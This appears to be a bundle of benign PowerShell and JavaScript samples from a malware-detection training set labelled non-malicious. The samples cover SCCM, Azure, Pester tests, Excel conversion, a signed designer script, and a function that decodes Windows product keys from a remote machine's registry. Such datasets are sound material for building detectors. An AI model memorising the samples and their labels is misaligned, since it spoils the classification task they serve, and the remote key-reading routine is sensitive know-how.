vnBi6oHYKM0+/hBklkvNWJE0BO7xun5jVwehkiyhY+nSrKVRf/afSEx4yAKENZX+ # VeFUIsO6W9c7HUTCrR1RKZxoogyJpOeGeED3i+SsBA== # SIG # End signature block
combined_dataset/train/non-malicious/2258.ps1
2258.ps1
[CmdletBinding(SupportsShouldProcess=$true)] param( [parameter(Mandatory=$true, HelpMessage="Site server where the SMS Provider is installed")] [ValidateNotNullOrEmpty()] [ValidateScript({Test-Connection -ComputerName $_ -Count 1 -Quiet})] [string]$SiteServer, [parameter(Mandatory=$false, HelpMessage="Show a progressbar displaying the current operation")] [switch]$ShowProgress ) Begin { try { Write-Verbose "Determining Site Code for Site server: '$($SiteServer)'" $SiteCodeObjects = Get-WmiObject -Namespace "root\SMS" -Class SMS_ProviderLocation -ComputerName $SiteServer -ErrorAction Stop foreach ($SiteCodeObject in $SiteCodeObjects) { if ($SiteCodeObject.ProviderForLocalSite -eq $true) { $SiteCode = $SiteCodeObject.SiteCode Write-Verbose -Message "Site Code: $($SiteCode)" } } } catch [System.UnauthorizedAccessException] { Write-Warning -Message "Access denied" ; break } catch [System.Exception] { Write-Warning -Message "Unable to determine Site Code" ; break } try { Add-Type -Path (Join-Path (Get-Item $env:SMS_ADMIN_UI_PATH).Parent.FullName "Microsoft.ConfigurationManagement.ApplicationManagement.dll") -ErrorAction Stop Add-Type -Path (Join-Path (Get-Item $env:SMS_ADMIN_UI_PATH).Parent.FullName "Microsoft.ConfigurationManagement.ApplicationManagement.Extender.dll") -ErrorAction Stop Add-Type -Path (Join-Path (Get-Item $env:SMS_ADMIN_UI_PATH).Parent.FullName "Microsoft.ConfigurationManagement.ApplicationManagement.MsiInstaller.dll") -ErrorAction Stop } catch [System.UnauthorizedAccessException] { Write-Warning -Message "Access denied" ; break } catch [System.Exception] { Write-Warning -Message $_.Exception.Message ; break } } Process { if ($PSBoundParameters["ShowProgress"]) { $ProgressCount = 0 } }
combined_dataset/train/non-malicious/get windows product key_3.ps1
get windows product key_3.ps1
function get-windowsproductkey([string]$computer) { $Reg = [WMIClass] ("\\\\" + $computer + "\\root\\default:StdRegProv") $values = [byte[]]($reg.getbinaryvalue(2147483650,"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion","DigitalProductId").uvalue) $lookup = [char[]]("B","C","D","F","G","H","J","K","M","P","Q","R","T","V","W","X","Y","2","3","4","6","7","8","9") $keyStartIndex = [int]52; $keyEndIndex = [int]($keyStartIndex + 15); $decodeLength = [int]29 $decodeStringLength = [int]15 $decodedChars = new-object char[] $decodeLength $hexPid = new-object System.Collections.ArrayList for ($i = $keyStartIndex; $i -le $keyEndIndex; $i++){ [void]$hexPid.Add($values[$i]) } for ( $i = $decodeLength - 1; $i -ge 0; $i--) { if (($i + 1) % 6 -eq 0){$decodedChars[$i] = '-'} else { $digitMapIndex = [int]0 for ($j = $decodeStringLength - 1; $j -ge 0; $j--) { $byteValue = [int](($digitMapIndex * [int]256) -bor [byte]$hexPid[$j]); $hexPid[$j] = [byte] ([math]::Floor($byteValue / 24)); $digitMapIndex = $byteValue % 24; $decodedChars[$i] = $lookup[$digitMapIndex]; } } } $STR = '' $decodedChars | % { $str+=$_} $STR } get-windowsproductkey .
combined_dataset/train/non-malicious/2999.ps1
2999.ps1
Set-StrictMode -Version Latest Describe "New-Fixture" { It "Name parameter is mandatory:" { (get-command New-Fixture ).Parameters.Name.ParameterSets.__AllParameterSets.IsMandatory | Should -Be $true } Context "Only Name parameter is specified:" { It "Creates fixture in current directory:" { $name = "Test-Fixture" $path = "TestDrive:\" Push-Location -Path $path New-Fixture -Name $name | Out-Null Pop-Location Join-Path -Path $path -ChildPath "$name.ps1" | Should -Exist Join-Path -Path $path -ChildPath "$name.Tests.ps1" | Should -Exist } } Context "Name and Path parameter is specified:" { It "Creates fixture in full Path:" { $name = "Test-Fixture" $path = "TestDrive:\full" New-Fixture -Name $name -Path $path | Out-Null Join-Path -Path $path -ChildPath "$name.ps1" | Should -Exist Join-Path -Path $path -ChildPath "$name.Tests.ps1" | Should -Exist Join-Path -Path "$path" -ChildPath "$name.ps1" | Remove-Item -Force Join-Path -Path "$path" -ChildPath "$name.Tests.ps1" | Remove-Item -Force } It "Creates fixture in relative Path:" { $name = "Relative1-Fixture" $path = "TestDrive:\" Push-Location -Path $path New-Fixture -Name $name -Path relative | Out-Null Pop-Location Join-Path -Path "$path\relative" -ChildPath "$name.ps1" | Should -Exist Join-Path -Path "$path\relative" -ChildPath "$name.Tests.ps1" | Should -Exist } It "Creates fixture if Path is set to '.':" { $name = "Relative2-Fixture" $path = "TestDrive:\" Push-Location -Path $path New-Fixture -Name $name -Path . | Out-Null Pop-Location Join-Path -Path "$path" -ChildPath "$name.ps1" | Should -Exist Join-Path -Path "$path" -ChildPath "$name.Tests.ps1" | Should -Exist } It "Creates fixture if Path is set to '(pwd)':" { $name = "Relative3-Fixture" $path = "TestDrive:\" Push-Location -Path $path New-Fixture -Name $name -Path (Get-Location) | Out-Null Pop-Location Join-Path -Path "$path" -ChildPath "$name.ps1" | Should -Exist Join-Path -Path "$path" -ChildPath "$name.Tests.ps1" | Should -Exist } It "Creates fixture if Path is set to '(pwd)' and Name contains the 'ps1' extension:" { $name = "Relative4-Fixture.ps1" $nameWithoutExtension = $name.Substring(0, $($name.Length) - 4) $path = "TestDrive:\" Push-Location -Path $path New-Fixture -Name $name -Path (Get-Location) | Out-Null Pop-Location Join-Path -Path "$path" -ChildPath "$nameWithoutExtension.ps1" | Should -Exist Join-Path -Path "$path" -ChildPath "$nameWithoutExtension.Tests.ps1" | Should -Exist } It "Writes warning if file exists" { $name = "Warning-Fixture" $path = "TestDrive:\" Mock -Verifiable -ModuleName Pester Write-Warning { } New-Fixture -Name $name -Path $path | Out-Null New-Fixture -Name $name -Path $path -WarningVariable warnings -WarningAction SilentlyContinue | Out-Null Assert-VerifiableMock } } }
combined_dataset/train/non-malicious/826.ps1
826.ps1
$cred = Get-Credential $resourceGroupName = "myResourceGroup" $scaleSetName = "myScaleSet" $location = "EastUS" New-AzResourceGroup -ResourceGroupName $resourceGroupName -Location $location $subnet = New-AzVirtualNetworkSubnetConfig ` -Name "mySubnet" ` -AddressPrefix 10.0.0.0/24 $vnet = New-AzVirtualNetwork ` -ResourceGroupName $resourceGroupName ` -Name "myVnet" ` -Location $location ` -AddressPrefix 10.0.0.0/16 ` -Subnet $subnet $publicIP = New-AzPublicIpAddress ` -ResourceGroupName $resourceGroupName ` -Location $location ` -AllocationMethod Static ` -Name "myPublicIP" $frontendIP = New-AzLoadBalancerFrontendIpConfig ` -Name "myFrontEndPool" ` -PublicIpAddress $publicIP $backendPool = New-AzLoadBalancerBackendAddressPoolConfig -Name "myBackEndPool" $inboundNATPool = New-AzLoadBalancerInboundNatPoolConfig ` -Name "myRDPRule" ` -FrontendIpConfigurationId $frontendIP.Id ` -Protocol TCP ` -FrontendPortRangeStart 50001 ` -FrontendPortRangeEnd 50010 ` -BackendPort 3389 $lb = New-AzLoadBalancer ` -ResourceGroupName $resourceGroupName ` -Name "myLoadBalancer" ` -Location $location ` -FrontendIpConfiguration $frontendIP ` -BackendAddressPool $backendPool ` -InboundNatPool $inboundNATPool Add-AzLoadBalancerProbeConfig -Name "myHealthProbe" ` -LoadBalancer $lb ` -Protocol TCP ` -Port 80 ` -IntervalInSeconds 15 ` -ProbeCount 2 Add-AzLoadBalancerRuleConfig ` -Name "myLoadBalancerRule" ` -LoadBalancer $lb ` -FrontendIpConfiguration $lb.FrontendIpConfigurations[0] ` -BackendAddressPool $lb.BackendAddressPools[0] ` -Protocol TCP ` -FrontendPort 80 ` -BackendPort 80 ` -Probe (Get-AzLoadBalancerProbeConfig -Name "myHealthProbe" -LoadBalancer $lb) Set-AzLoadBalancer -LoadBalancer $lb $ipConfig = New-AzVmssIpConfig ` -Name "myIPConfig" ` -LoadBalancerBackendAddressPoolsId $lb.BackendAddressPools[0].Id ` -LoadBalancerInboundNatPoolsId $inboundNATPool.Id ` -SubnetId $vnet.Subnets[0].Id $vmssConfig = New-AzVmssConfig ` -Location $location ` -SkuCapacity 2 ` -SkuName "Standard_DS2" ` -UpgradePolicyMode "Automatic" Set-AzVmssStorageProfile $vmssConfig ` -OsDiskCreateOption "FromImage" ` -ImageReferencePublisher "MicrosoftWindowsServer" ` -ImageReferenceOffer "WindowsServer" ` -ImageReferenceSku "2016-Datacenter" ` -ImageReferenceVersion "latest" Set-AzVmssOsProfile $vmssConfig ` -AdminUsername $cred.UserName ` -AdminPassword $cred.Password ` -ComputerNamePrefix "myVM" Add-AzVmssNetworkInterfaceConfiguration ` -VirtualMachineScaleSet $vmssConfig ` -Name "network-config" ` -Primary $true ` -IPConfiguration $ipConfig New-AzVmss ` -ResourceGroupName $resourceGroupName ` -Name $scaleSetName ` -VirtualMachineScaleSet $vmssConfig
combined_dataset/train/non-malicious/4448.ps1
4448.ps1
function Install-Package { [CmdletBinding()] param ( [Parameter(Mandatory=$true)] [ValidateNotNullOrEmpty()] [string] $FastPackageReference ) Write-Debug ($LocalizedData.ProviderApiDebugMessage -f ('Install-Package')) Install-PackageUtility -FastPackageReference $FastPackageReference -Request $Request }
combined_dataset/train/non-malicious/sample_30_52.ps1
sample_30_52.ps1
# # Module manifest for module 'OCI.PSModules.Audit' # # Generated by: Oracle Cloud Infrastructure # # @{ # Script module or binary module file associated with this manifest. RootModule = 'assemblies/OCI.PSModules.Audit.dll' # Version number of this module. ModuleVersion = '81.0.0' # Supported PSEditions CompatiblePSEditions = 'Core' # ID used to uniquely identify this module GUID = '159ba3cf-8d7b-460e-bb56-36417d6f4316' # Author of this module Author = 'Oracle Cloud Infrastructure' # Company or vendor of this module CompanyName = 'Oracle Corporation' # Copyright statement for this module Copyright = '(c) Oracle Cloud Infrastructure. All rights reserved.' # Description of the functionality provided by this module Description = 'This modules provides Cmdlets for OCI Audit Service' # Minimum version of the PowerShell engine required by this module PowerShellVersion = '6.0' # Name of the PowerShell host required by this module # PowerShellHostName = '' # Minimum version of the PowerShell host required by this module # PowerShellHostVersion = '' # Minimum version of Microsoft .NET Framework required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # DotNetFrameworkVersion = '' # Minimum version of the common language runtime (CLR) required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # ClrVersion = '' # Processor architecture (None, X86, Amd64) required by this module # ProcessorArchitecture = '' # Modules that must be imported into the global environment prior to importing this module RequiredModules = @(@{ModuleName = 'OCI.PSModules.Common'; GUID = 'b3061a0d-375b-4099-ae76-f92fb3cdcdae'; RequiredVersion = '81.0.0'; }) # Assemblies that must be loaded prior to importing this module RequiredAssemblies = 'assemblies/OCI.DotNetSDK.Audit.dll' # Script files (.ps1) that are run in the caller's environment prior to importing this module. # ScriptsToProcess = @() # Type files (.ps1xml) to be loaded when importing this module # TypesToProcess = @() # Format files (.ps1xml) to be loaded when importing this module # FormatsToProcess = @() # Modules to import as nested modules of the module specified in RootModule/ModuleToProcess # NestedModules = @() # Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export. FunctionsToExport = '*' # Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export. CmdletsToExport = 'Get-OCIAuditConfiguration', 'Get-OCIAuditEventsList', 'Update-OCIAuditConfiguration' # Variables to export from this module VariablesToExport = '*' # Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export. AliasesToExport = '*' # DSC resources to export from this module # DscResourcesToExport = @() # List of all modules packaged with this module # ModuleList = @() # List of all files packaged with this module # FileList = @() # Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell. PrivateData = @{ PSData = @{ # Tags applied to this module. These help with module discovery in online galleries. Tags = 'PSEdition_Core','Windows','Linux','macOS','Oracle','OCI','Cloud','OracleCloudInfrastructure','Audit' # A URL to the license for this module. LicenseUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/LICENSE.txt' # A URL to the main website for this project. ProjectUri = 'https://github.com/oracle/oci-powershell-modules/' # A URL to an icon representing this module. IconUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/icon.png' # ReleaseNotes of this module ReleaseNotes = 'https://github.com/oracle/oci-powershell-modules/blob/master/CHANGELOG.md' # Prerelease string of this module # Prerelease = '' # Flag to indicate whether the module requires explicit user acceptance for install/update/save # RequireLicenseAcceptance = $false # External dependent modules of this module # ExternalModuleDependencies = @() } # End of PSData hashtable } # End of PrivateData hashtable # HelpInfo URI of this module # HelpInfoURI = '' # Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. # DefaultCommandPrefix = '' }
combined_dataset/train/non-malicious/1629.ps1
1629.ps1
function Save-ExcelasCSV { param ( [string[]]$files = $(Throw 'No files provided.'), [string]$OutFolder, [switch]$Overwrite ) BEGIN { function Release-Ref ($ref) { ([System.Runtime.InteropServices.Marshal]::ReleaseComObject([System.__ComObject]$ref) -gt 0) [System.GC]::Collect() [System.GC]::WaitForPendingFinalizers() } $xl = New-Object -ComObject Excel.Application $xl.DisplayAlerts = $false $xl.Visible = $false } PROCESS { foreach ($file in $files) { $file = Get-Item $file | ? {$_.Extension -match '^\.xlsx?$'} if (!$file) {continue} $wb = $xl.Workbooks.Open($file.FullName) if ($OutFolder) { $CSVfilename = Join-Path $OutFolder ($file.BaseName + '.csv') } else { $CSVfilename = $file.DirectoryName + '\' + $file.BaseName + '.csv' } if (!$Overwrite -and (Test-Path $CSVfilename)) { $num = 1 $folder = Split-Path $CSVfilename $base = (Split-Path $CSVfilename -Leaf).Substring(0, (Split-Path $CSVfilename -Leaf).LastIndexOf('.')) $ext = $CSVfilename.Substring($CSVfilename.LastIndexOf('.')) while (Test-Path $CSVfilename) { $CSVfilename = Join-Path $folder $($base + "-$num" + $ext) $num += 1 } $wb.SaveAs($CSVfilename, 6) } else { $wb.SaveAs($CSVfilename, 6) } $wb.Close($True) $CSVfilename } } END { $xl.Quit() $null = $wb, $xl | % {try{ Release-Ref $_ }catch{}} } }
combined_dataset/train/non-malicious/4172.ps1
4172.ps1
cls $File = Get-Content -Path "C:\Users\Mick\Desktop\BDD.log" -Force Foreach ($Entry in $File) { If (($Entry -like '*INSTALL - *') -and ($Entry -like '*ZTIWindowsUpdate*')) { $SplitLine = $Entry.Split('KB') $Update = $SplitLine[2] $Update = $Update.Split(')') $Update = $Update.Split('(') Write-Host "KB"$Update[0] } } Remove-Variable -Name Entry -Force Remove-Variable -Name File -Force Remove-Variable -Name Update -Force
combined_dataset/train/non-malicious/sample_33_18.ps1
sample_33_18.ps1
function trySetDesignerProp(tname, ttype, val) { var trait = document.designerProps.getOrCreateTrait(tname, ttype, 0); trait.value = val; // services.debug.trace(tname + "=" + val); } if (command.getTrait("state").value == 0) { command.getTrait("state").value = 2; trySetDesignerProp("snap", "bool", true); } else { command.getTrait("state").value = 0; trySetDesignerProp("snap", "bool", false); } // SIG // Begin signature block // SIG // MIIoOgYJKoZIhvcNAQcCoIIoKzCCKCcCAQExDzANBglg // SIG // hkgBZQMEAgEFADB3BgorBgEEAYI3AgEEoGkwZzAyBgor // SIG // BgEEAYI3AgEeMCQCAQEEEBDgyQbOONQRoqMAEEvTUJAC // SIG // AQACAQACAQACAQACAQAwMTANBglghkgBZQMEAgEFAAQg // SIG // 3gixTOddaqOMfruK7gccg89aUDeGe0EbwlEag1UrCBeg // SIG // gg2FMIIGAzCCA+ugAwIBAgITMwAAA64tNVHIU49VHQAA // SIG // AAADrjANBgkqhkiG9w0BAQsFADB+MQswCQYDVQQGEwJV // SIG // UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH // SIG // UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBv // SIG // cmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQgQ29kZSBT // SIG // aWduaW5nIFBDQSAyMDExMB4XDTIzMTExNjE5MDg1OVoX // SIG // DTI0MTExNDE5MDg1OVowdDELMAkGA1UEBhMCVVMxEzAR // SIG // BgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1v // SIG // bmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv // SIG // bjEeMBwGA1UEAxMVTWljcm9zb2Z0IENvcnBvcmF0aW9u // SIG // MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA // SIG // 9CD8pjY3wxCoPmMhOkow7ycCltfqYnqk4wGNApzh2dTY // SIG // +YqxozWTzJUOB38VxsgFQmXBFhOMdrGYGpvO9kdbNPkw // SIG // HpTrW6hZqFuLLiRwGKEx4ZM5zVSqbHJuX2fPfUJ0Xmb+ // SIG // VrVsGw/BwBV2zz0rVtiSgqj3GeeGOsG7llfWyrSjyJqm // SIG // 5DHE3o04BAI/NuhkHOv04euiqJGvHFCL8+fXvyD9OAxq // SIG // 4fcJKtoyBb0PBA3oMNQeCsiUyLO+voZqVTOUsAWY0bN5 // SIG // YjkK4nq5DVaNdVrrowd5AX9gmz6D/TJTssns6pDCG00Y // SIG // +Dh3ipWpnVmkhYcByyUSEKX3PLC8DkiAQQIDAQABo4IB // SIG // gjCCAX4wHwYDVR0lBBgwFgYKKwYBBAGCN0wIAQYIKwYB // SIG // BQUHAwMwHQYDVR0OBBYEFIcf73Spl4cHOFoll27H9COd // SIG // 4fE/MFQGA1UdEQRNMEukSTBHMS0wKwYDVQQLEyRNaWNy // SIG // b3NvZnQgSXJlbGFuZCBPcGVyYXRpb25zIExpbWl0ZWQx // SIG // FjAUBgNVBAUTDTIzMDAxMis1MDE4MzYwHwYDVR0jBBgw // SIG // FoAUSG5k5VAF04KqFzc3IrVtqMp1ApUwVAYDVR0fBE0w // SIG // SzBJoEegRYZDaHR0cDovL3d3dy5taWNyb3NvZnQuY29t // SIG // L3BraW9wcy9jcmwvTWljQ29kU2lnUENBMjAxMV8yMDEx // SIG // LTA3LTA4LmNybDBhBggrBgEFBQcBAQRVMFMwUQYIKwYB // SIG // BQUHMAKGRWh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9w // SIG // a2lvcHMvY2VydHMvTWljQ29kU2lnUENBMjAxMV8yMDEx // SIG // LTA3LTA4LmNydDAMBgNVHRMBAf8EAjAAMA0GCSqGSIb3 // SIG // DQEBCwUAA4ICAQBqyWA1Eu7PKNMjaaxl0V7gJ0XBysUo // SIG // xZluMHJXFE2LEGZIZ2zMLYVjOnAGG/4dluRjSrZZo/8v // SIG // wk4Xt8v6NBB9ofo8H1P/XidHytWTv9lg9MYu++6lPmu5 // SIG // fCozD3cI2NLZPW2BBhGX2D0R8tQBj0FbmZRuIucpiQ7D // SIG // K3CHKlfKcc7MP8pPzuMv55Tox8+KFQD1NG6+bfbYA/BN // SIG // PBkg4tyOh+exbaHfcNuodDJUIjq9dF6oa+Yjy0u0pUMI // SIG // /B1t+8m6rJo0KSoZlrpesYl0jRhpt+hmqx8uENXoGJcY // SIG // ZVJ5N2Skq90LViKNRhi9N4U+e8c4y9uXyomUF/6viCPJ // SIG // 7huTNEJo75ehIJba+IWd3txUEc0R3y6DT6txC6cW1nR/ // SIG // LTbo9I/8fQq538G5IvJ+e5iSiOSVVkVk0i5m03Awy5E2 // SIG // ZSS4PVdQSCcFxmN4tpEfYuR7AAy/GJVtIDFlUpSgdXok // SIG // pSui5hYtK1R9enXXvo+U/xGkLRc+qp4De3dZbzu7pOq7 // SIG // V/jCyhuCw0bEIAU4urCGIip7TI6GBRzD7yPzjFIqeZY7 // SIG // S4rVW5BRn2oEqpm8Su6yTIQvMIk8x2pwYNUa2339Z4gW // SIG // 5xW21eFA5mLpo7NRSKRQms5OgAA18aCgqOU7Ds0h6q/Y // SIG // B4BmEAtoTMl/TBiyKaMGAlEcdy+5FIhmzojMGjCCB3ow // SIG // ggVioAMCAQICCmEOkNIAAAAAAAMwDQYJKoZIhvcNAQEL // SIG // BQAwgYgxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNo // SIG // aW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQK // SIG // ExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xMjAwBgNVBAMT // SIG // KU1pY3Jvc29mdCBSb290IENlcnRpZmljYXRlIEF1dGhv // SIG // cml0eSAyMDExMB4XDTExMDcwODIwNTkwOVoXDTI2MDcw // SIG // ODIxMDkwOVowfjELMAkGA1UEBhMCVVMxEzARBgNVBAgT // SIG // Cldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAc // SIG // BgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEoMCYG // SIG // A1UEAxMfTWljcm9zb2Z0IENvZGUgU2lnbmluZyBQQ0Eg // SIG // MjAxMTCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoC // SIG // ggIBAKvw+nIQHC6t2G6qghBNNLrytlghn0IbKmvpWlCq // SIG // uAY4GgRJun/DDB7dN2vGEtgL8DjCmQawyDnVARQxQtOJ // SIG // DXlkh36UYCRsr55JnOloXtLfm1OyCizDr9mpK656Ca/X // SIG // llnKYBoF6WZ26DJSJhIv56sIUM+zRLdd2MQuA3WraPPL // SIG // bfM6XKEW9Ea64DhkrG5kNXimoGMPLdNAk/jj3gcN1Vx5 // SIG // pUkp5w2+oBN3vpQ97/vjK1oQH01WKKJ6cuASOrdJXtjt // SIG // 7UORg9l7snuGG9k+sYxd6IlPhBryoS9Z5JA7La4zWMW3 // SIG // Pv4y07MDPbGyr5I4ftKdgCz1TlaRITUlwzluZH9TupwP // SIG // rRkjhMv0ugOGjfdf8NBSv4yUh7zAIXQlXxgotswnKDgl // SIG // mDlKNs98sZKuHCOnqWbsYR9q4ShJnV+I4iVd0yFLPlLE // SIG // tVc/JAPw0XpbL9Uj43BdD1FGd7P4AOG8rAKCX9vAFbO9 // SIG // G9RVS+c5oQ/pI0m8GLhEfEXkwcNyeuBy5yTfv0aZxe/C // SIG // HFfbg43sTUkwp6uO3+xbn6/83bBm4sGXgXvt1u1L50kp // SIG // pxMopqd9Z4DmimJ4X7IvhNdXnFy/dygo8e1twyiPLI9A // SIG // N0/B4YVEicQJTMXUpUMvdJX3bvh4IFgsE11glZo+TzOE // SIG // 2rCIF96eTvSWsLxGoGyY0uDWiIwLAgMBAAGjggHtMIIB // SIG // 6TAQBgkrBgEEAYI3FQEEAwIBADAdBgNVHQ4EFgQUSG5k // SIG // 5VAF04KqFzc3IrVtqMp1ApUwGQYJKwYBBAGCNxQCBAwe // SIG // CgBTAHUAYgBDAEEwCwYDVR0PBAQDAgGGMA8GA1UdEwEB // SIG // /wQFMAMBAf8wHwYDVR0jBBgwFoAUci06AjGQQ7kUBU7h // SIG // 6qfHMdEjiTQwWgYDVR0fBFMwUTBPoE2gS4ZJaHR0cDov // SIG // L2NybC5taWNyb3NvZnQuY29tL3BraS9jcmwvcHJvZHVj // SIG // dHMvTWljUm9vQ2VyQXV0MjAxMV8yMDExXzAzXzIyLmNy // SIG // bDBeBggrBgEFBQcBAQRSMFAwTgYIKwYBBQUHMAKGQmh0 // SIG // dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2kvY2VydHMv // SIG // TWljUm9vQ2VyQXV0MjAxMV8yMDExXzAzXzIyLmNydDCB // SIG // nwYDVR0gBIGXMIGUMIGRBgkrBgEEAYI3LgMwgYMwPwYI // SIG // KwYBBQUHAgEWM2h0dHA6Ly93d3cubWljcm9zb2Z0LmNv // SIG // bS9wa2lvcHMvZG9jcy9wcmltYXJ5Y3BzLmh0bTBABggr // SIG // BgEFBQcCAjA0HjIgHQBMAGUAZwBhAGwAXwBwAG8AbABp // SIG // AGMAeQBfAHMAdABhAHQAZQBtAGUAbgB0AC4gHTANBgkq // SIG // hkiG9w0BAQsFAAOCAgEAZ/KGpZjgVHkaLtPYdGcimwuW // SIG // EeFjkplCln3SeQyQwWVfLiw++MNy0W2D/r4/6ArKO79H // SIG // qaPzadtjvyI1pZddZYSQfYtGUFXYDJJ80hpLHPM8QotS // SIG // 0LD9a+M+By4pm+Y9G6XUtR13lDni6WTJRD14eiPzE32m // SIG // kHSDjfTLJgJGKsKKELukqQUMm+1o+mgulaAqPyprWElj // SIG // HwlpblqYluSD9MCP80Yr3vw70L01724lruWvJ+3Q3fMO // SIG // r5kol5hNDj0L8giJ1h/DMhji8MUtzluetEk5CsYKwsat // SIG // ruWy2dsViFFFWDgycScaf7H0J/jeLDogaZiyWYlobm+n // SIG // t3TDQAUGpgEqKD6CPxNNZgvAs0314Y9/HG8VfUWnduVA // SIG // KmWjw11SYobDHWM2l4bf2vP48hahmifhzaWX0O5dY0Hj // SIG // Wwechz4GdwbRBrF1HxS+YWG18NzGGwS+30HHDiju3mUv // SIG // 7Jf2oVyW2ADWoUa9WfOXpQlLSBCZgB/QACnFsZulP0V3 // SIG // HjXG0qKin3p6IvpIlR+r+0cjgPWe+L9rt0uX4ut1eBrs // SIG // 6jeZeRhL/9azI2h15q/6/IvrC4DqaTuv/DDtBEyO3991 // SIG // bWORPdGdVk5Pv4BXIqF4ETIheu9BCrE/+6jMpF3BoYib // SIG // V3FWTkhFwELJm3ZbCoBIa/15n8G9bW1qyVJzEw16UM0x // SIG // ghoNMIIaCQIBATCBlTB+MQswCQYDVQQGEwJVUzETMBEG // SIG // A1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u // SIG // ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9u // SIG // MSgwJgYDVQQDEx9NaWNyb3NvZnQgQ29kZSBTaWduaW5n // SIG // IFBDQSAyMDExAhMzAAADri01UchTj1UdAAAAAAOuMA0G // SIG // CWCGSAFlAwQCAQUAoIGuMBkGCSqGSIb3DQEJAzEMBgor // SIG // BgEEAYI3AgEEMBwGCisGAQQBgjcCAQsxDjAMBgorBgEE // SIG // AYI3AgEVMC8GCSqGSIb3DQEJBDEiBCDDYHaCzgcxaKMa // SIG // UrrqOWogzkkRTJ+vK+WIJn+mSWAmZDBCBgorBgEEAYI3 // SIG // AgEMMTQwMqAUgBIATQBpAGMAcgBvAHMAbwBmAHShGoAY // SIG // aHR0cDovL3d3dy5taWNyb3NvZnQuY29tMA0GCSqGSIb3 // SIG // DQEBAQUABIIBAHVShPlDmca3LBNWSdTnZx+RAekY89QA // SIG // mh5YeuyYuDqrXB+X2TxQ3jZiB0aSiRvSoFRJWULLmI1/ // SIG // w78+QxV24UKnw9SUfEtC6AyCjRqbuQDFgyfdLXPLCvaZ // SIG // J99nwNtD1vOR0i/bsHNkl5txaPVJE6WDLLV5MPSwG97b // SIG // H46KYR3q0nyx1LS6HgLmfyoMas8Ajhi0Ggb7J6fGtj56 // SIG // GnoPYhfvdEzpTK/H9O817StBtogw5cWvBhI6dYKb9MCu // SIG // gOvNVjo+LtTESqVmZbaA+xIYvU2YhQag2omdmgYtNXVh // SIG // tdaua7osjp+e67QmjXh2RY5e7HNbP8aRaapOeRPTAx5b // SIG // K1qhgheXMIIXkwYKKwYBBAGCNwMDATGCF4Mwghd/Bgkq // SIG // hkiG9w0BBwKgghdwMIIXbAIBAzEPMA0GCWCGSAFlAwQC // SIG // AQUAMIIBUgYLKoZIhvcNAQkQAQSgggFBBIIBPTCCATkC // SIG // AQEGCisGAQQBhFkKAwEwMTANBglghkgBZQMEAgEFAAQg // SIG // JZLm8PVDR4Xp2aPWDwm1MmugCb+HOXnlbAB+gUWG3ZIC // SIG // BmXOAXEwLRgTMjAyNDAzMDEwMDM1MzEuMDY0WjAEgAIB // SIG // 9KCB0aSBzjCByzELMAkGA1UEBhMCVVMxEzARBgNVBAgT // SIG // Cldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAc // SIG // BgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjElMCMG // SIG // A1UECxMcTWljcm9zb2Z0IEFtZXJpY2EgT3BlcmF0aW9u // SIG // czEnMCUGA1UECxMeblNoaWVsZCBUU1MgRVNOOjkyMDAt // SIG // MDVFMC1EOTQ3MSUwIwYDVQQDExxNaWNyb3NvZnQgVGlt // SIG // ZS1TdGFtcCBTZXJ2aWNloIIR7TCCByAwggUIoAMCAQIC // SIG // EzMAAAHnLo8vkwtPG+kAAQAAAecwDQYJKoZIhvcNAQEL // SIG // BQAwfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hp // SIG // bmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT // SIG // FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMd // SIG // TWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTAwHhcN // SIG // MjMxMjA2MTg0NTE5WhcNMjUwMzA1MTg0NTE5WjCByzEL // SIG // MAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x // SIG // EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv // SIG // c29mdCBDb3Jwb3JhdGlvbjElMCMGA1UECxMcTWljcm9z // SIG // b2Z0IEFtZXJpY2EgT3BlcmF0aW9uczEnMCUGA1UECxMe // SIG // blNoaWVsZCBUU1MgRVNOOjkyMDAtMDVFMC1EOTQ3MSUw // SIG // IwYDVQQDExxNaWNyb3NvZnQgVGltZS1TdGFtcCBTZXJ2 // SIG // aWNlMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKC // SIG // AgEAwlefL+CLkOufVzzNQ7WljL/fx0VAuZHYhBfPWAT+ // SIG // v0Z+5I6jJGeREnpn+RJYuAi7UFUnn0aRdY+0uSyyorDF // SIG 